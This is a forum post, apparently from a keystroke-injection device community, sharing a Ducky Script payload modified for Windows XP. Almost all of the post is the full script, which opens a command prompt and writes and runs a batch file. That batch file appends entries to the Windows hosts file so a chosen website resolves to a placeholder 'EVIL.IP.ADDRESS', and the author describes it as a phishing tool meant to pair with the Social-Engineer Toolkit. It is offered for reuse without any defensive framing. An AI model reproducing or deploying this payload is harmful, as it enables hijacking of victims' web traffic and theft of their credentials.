skimpniff Posted February 22, 2012 Share Posted February 22, 2012 (edited) Based on the original script by Koryusai-Kun written for Win7I take minimal credit for this, I only took a great script and modified it for XP.Darren, how do we get new payloads onto the GitHub site? Through you or is there a more direct way? REM Author: .:skimpniff:. REM Based on the original script by Koryusai-Kun written for Win7 REM Modified for use on WinXP REM Description: Used for phishing, it add's ips of your choosing to the hosts file on windows REM Description: so when the user types the website into there web browser it redirects them REM Description: to your evil IP. Works perfectly in conjunction with SET. REM Description: Don't forget to add both versions, with and without the www prefix. GUI r DELAY 600 STRING cmd DELAY 400 STRING cd %WINDIR%\system32\drivers\etc\ DELAY 400 STRING copy con inject.bat DELAY 400 ENTER DELAY 400 STRING SET NEWLINE=^& echo. ENTER DELAY 400 STRING FIND /C /I "WEBSITE" %WINDIR%\system32\drivers\etc\hosts ENTER DELAY 400 STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^EVIL.IP.ADDRESS WEBSITE>>%WINDIR%\system32\drivers\etc\hosts ENTER STRING FIND /C /I "www.WEBSITE" %WINDIR%\system32\drivers\etc\hosts ENTER DELAY 400 STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^EVIL.IP.ADDRESS www.WEBSITE>>%WINDIR%\system32\drivers\etc\hosts ENTER DELAY 400 CONTROL z ENTER DELAY 400 STRING inject.bat ENTER DELAY 600 STRING exit ENTER Edited February 17, 2013 by midnitesnake formatting Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.